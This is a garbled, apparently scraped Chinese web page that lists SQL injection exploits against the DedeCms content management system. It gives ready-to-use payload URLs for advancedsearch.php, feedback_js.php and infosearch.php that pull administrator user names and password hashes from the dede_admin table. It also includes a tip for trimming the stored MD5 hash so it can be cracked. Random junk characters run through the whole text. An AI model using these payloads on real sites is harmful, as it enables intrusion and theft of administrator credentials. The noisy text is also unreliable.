1 Z5 y+ j$ O& `7 C& w ; q |1 S# t- [. D2 X& w# E% M
+ N; G- X( Q$ J9 N, Z; F: X2 e" e, _
' N5 Q* j( b d) C+ y
0 |; ?+ Q4 b b1 @/ O* r9 t) U' p* i" ?% [; s7 o
d6 y P: Q6 u# `) ?' ?5 g 7 D f- M8 k1 z b yDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 . K8 \3 X2 p# y, O5 Q; dplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ' }1 d- \! e9 X* A' ]5 ?密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD53 l( T8 P- H6 R" K! x
) j5 c4 u4 F) o8 N; A6 p
; m; J* x; l0 V8 @, b* @7 D- f# V L5 `1 W1 o) u5 V- |2 |7 u
3 `( b# c: J# t5 J6 s7 H; u
# A$ D4 g- l* A) b% b% K2 [ - M) J/ {* h! R* L. u0 h6 o " v, @# D% @3 J V 5 M. E" Q/ X8 N, u( c0 V. B+ Y * {, H. u" T3 P3 i6 K6 p # e7 p2 A1 G( J4 w7 x' n! n5 \织梦(Dedecms) 5.1 feedback_js.php 注入漏洞4 i8 U0 W2 r5 ?# v! f6 q& ?
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='$ p0 ~8 e" \' ~& @2 `, o0 X
. F" s& i( M7 ^' _) ^' W: Y4 h8 p
& \( D7 W# e ]( m" u* H2 H7 X
* O8 u2 g7 p- f) j& j
0 x& [: c, j* `7 b' h G0 y9 w% m3 g. a. F; g" n0 Y+ A# }' E% ~$ P
& K' b# l2 z2 k# y8 \1 Z( Y% I x5 E
* l' u* F% `8 N. v% W- l3 y织梦(DedeCms)plus/infosearch.php 文件注入漏洞 # ]1 V, C) I. r2 K8 Shttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*